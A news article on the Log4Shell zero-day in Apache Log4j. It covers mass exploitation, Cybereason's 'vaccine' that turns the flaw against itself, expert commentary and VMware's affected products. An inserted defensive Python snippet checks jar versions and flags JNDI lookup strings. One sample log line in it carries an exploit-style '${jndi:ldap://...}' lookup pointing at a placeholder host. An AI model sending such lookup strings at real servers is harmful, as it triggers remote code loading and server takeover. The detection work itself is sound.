Log4j: 'Vaccine' Released for Exploited Apache Zero-Day
Researchers Say Severity 10 Vulnerability Being Exploited by Access Brokers
Urgent application of a temporary fix is advised as advanced persistent threat-level actors and access brokers are now reported to be conducting mass scanning for the zero-day vulnerability detected in the Java logging library Apache Log4j, which can result in full server takeover and leaves countless applications vulnerable.
Cisco Talos researchers say that they are seeing active exploitation on their honeypot network and in sensor telemetry by APT-level actors. Cybersecurity firm GreyNoise says that a wide variety of use cases for this exploit have already begun to appear, ranging from exploiting Minecraft servers to more high-profile issues potentially affecting Apple iCloud.
On Friday evening, however, security firm Cybereason said it has developed and released an urgent "vaccine" for the easily exploitable flaw that was first detected in the popular game Minecraft, but cloud applications, including those widely used across the enterprise, also remain vulnerable. This includes software, web apps and products from Apple, Amazon, Cloudflare, Twitter and Steam.
The unauthenticated remote code execution vulnerability - classified as severe and tracked as CVE-2021-44228, with a CVSS score of 10 - is actively being exploited in the wild, and proof-of-concept code has been published, according to an advisory from CERT New Zealand on Friday (see: Severe Apache Log4j Vulnerability Threatens Enterprise Apps).
The advisory says that the systems and services using the Java logging library Apache Log4j between version 2.0 and 2.14.1 are vulnerable, including many applications and services written in Java.
Temporary Fix
Experts at Cybereason released an urgent fix for the vulnerability, available on GitHub. Researchers say that exploiting the flaw is trivial: an attacker sends a malicious string that gets logged by Log4j, and at that point the exploit allows the attacker to load arbitrary Java code and take control of the server.
Researchers are recommending that affected systems apply patching as soon as possible. But Cybereason says it has found a way to disable the vulnerability for systems that can’t be updated - or at least not updated immediately.
"Logout4Shell is a vaccine to protect against exploits targeting the Log4Shell flaw. The fix uses the vulnerability itself to set the flag that turns it off. Because the vulnerability is so easy to exploit and so ubiquitous, it's one of the very few ways to close it in certain scenarios," Cybereason researchers say. "You can permanently close the vulnerability by causing the server to save a configuration file, but that is a more difficult proposition. The simplest solution is to set up a server that will download and then run a class that changes the server's configuration to not load things anymore."
But researchers recommend that users update immediately to the latest version to permanently remediate the vulnerability. This fix just disables the vulnerability and allows users to remain protected while they assess and update their servers, the researchers say.
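The two checks a defender needs first, as an added example that is not code from the article, Cybereason or the Log4j project: whether a Log4j 2 core jar on disk falls in the 2.0 to 2.14.1 range the advisory names, and whether logged request data contains the lookup string form the exploit relies on. The jar paths and log lines are constructed samples, and the `${jndi:` pattern is an assumption about the exploit string, which the article does not spell out.

```python
import re

# Version range the article cites as vulnerable (inclusive). Check the current
# Apache advisory for the release you should actually upgrade to.
VULN_MIN = (2, 0, 0)
VULN_MAX = (2, 14, 1)

# Matches log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar, etc. (not log4j-api).
JAR_RE = re.compile(
    r"log4j-core-(\d+(?:\.\d+)*)(?:-(?:beta|rc)\d*)?\.jar$", re.IGNORECASE
)
# Plain-text lookup marker; assumption: the logged exploit string starts "${jndi:".
# Nested-lookup obfuscation exists in the wild and needs a more thorough rule.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0' -> (2, 0, 0)."""
    parts = tuple(int(p) for p in text.split("."))
    return (parts + (0, 0, 0))[:3]


def is_vulnerable_version(version):
    return VULN_MIN <= parse_version(version) <= VULN_MAX


def find_vulnerable_jars(paths):
    """Return (path, version) for every log4j-core jar in the vulnerable range."""
    hits = []
    for path in paths:
        m = JAR_RE.search(path)
        if m and is_vulnerable_version(m.group(1)):
            hits.append((path, m.group(1)))
    return hits


def flag_jndi_lookups(log_lines):
    """Return the log lines that carry a JNDI lookup string (for alerting)."""
    return [line for line in log_lines if JNDI_RE.search(line)]


# Constructed sample inventory and access-log lines (not real hosts).
SAMPLE_JARS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/legacy/lib/log4j-core-2.0-beta9.jar",
    "/opt/patched/lib/log4j-core-2.15.0.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",
]
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://PLACEHOLDER-HOST/x}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 302 0 "-" "curl/7.79"',
]
```

Point `find_vulnerable_jars` at a real file listing (for example the output of `find / -name 'log4j-core-*.jar'`) to turn it into an inventory check; jars shaded into fat application jars need the same version check run on their embedded manifest.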
Jake Williams, formerly a member of the U.S. National Security Agency's elite hacking team, tells Information Security Media Group that this vulnerability is extremely serious and that it is an RCE, or remote code execution, vulnerability in a widely employed library.
"It's difficult to patch and because many organizations don't even realize they have the vulnerable library they may not be thinking about patching. The Cybereason vaccine is rather ingenious in that it prevents exploitation of a vulnerable server until it is restarted by exploiting the vulnerability," Williams, who is also the CTO of cybersecurity firm BreachQuest, tells ISMG. "The only concern with the vaccine is that some organizations may confuse this for a patch and not realize that they need to re-exploit the service every time it restarts. Even in cases where organizations understand the need, they may still leave the vulnerable server exposed for a time between a restart and applying the vaccine again."
Tim Mackey, principal security strategist, Synopsys Cybersecurity Research Center, describes the implications of Apache Log4j being the de facto way Java applications write their log information: “This means that a very large number of applications are potentially impacted by CVE-2021-44228, and we’ve already seen reports of just how easy it is to trigger the exploit. That’s the worrisome aspect of most zero-day vulnerabilities - that it’s easy to trigger and impacts a ubiquitous piece of software. In this case, exploit of CVE-2021-44228 can allow remote code to be executed, and while that’s problematic enough, the reality is there are likely other potential outcomes from an exploit - we just haven’t seen them or heard them reported. That’s because vulnerability disclosure isn’t a point-in-time activity. Instead, the disclosure serves as a trigger for security researchers and attackers alike to identify what other potential weaknesses the impacted code might have.”
Mackey advises: “Protecting against exposure to CVE-2021-44228 starts with a basic element of software supply chain risk management: Know the code that powers your business. If you don’t know which applications run Java and have a vulnerable version of Log4j, then you can’t guarantee you’ve patched everything. If you’re relying on periodic scans of software or configurations to determine whether you’re exposed to something, then it’s time to start looking at continuous monitoring for software supply chain issues and possibly implementing automated pen-testing capabilities. After all, it’s always possible for a vulnerable version of something that should’ve been patched to be used elsewhere or by a different supplier.”
Further Exploitation
On Thursday, researchers at GreyNoise noticed that weaponized proof-of-concept exploits began to appear, leading to a rapid increase in scanning and public exploitation on Friday. Between noon EST and 2 p.m. EST on Friday, GreyNoise observed a fivefold increase in the number of hits per sensor related to the Log4Shell event.
Williams states that he is not aware of any nation-state actors using the flaw, but he says it's definitely being exploited by access brokers, many of whom sell access to ransomware operators. And he says he has seen some RATs being dropped, which will be used by access brokers, but he believes it is too early for ransomware associated with this.
Researchers at GreyNoise have an updated list of all IP addresses opportunistically scanning the internet to vulnerability-check or exploit CVE-2021-44228, as described in this tag summary in the GreyNoise Visualizer.
VMware has released a critical security advisory covering multiple products that use the open-source Log4j Java logging component. The company has confirmed that exploitation attempts have occurred in the wild.
So far, the company has released a list of more than 25 products that could be affected by this vulnerability. The products confirmed as affected or currently under evaluation include VMware Horizon, VMware vCenter Server, VMware HCX, VMware NSX-T Data Center, Unified Access Gateway, Workspace ONE Access, Identity Manager, vRealize Operations, vRealize Operations Cloud Proxy and vRealize Log Insight, among others.
"A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system," VMware says.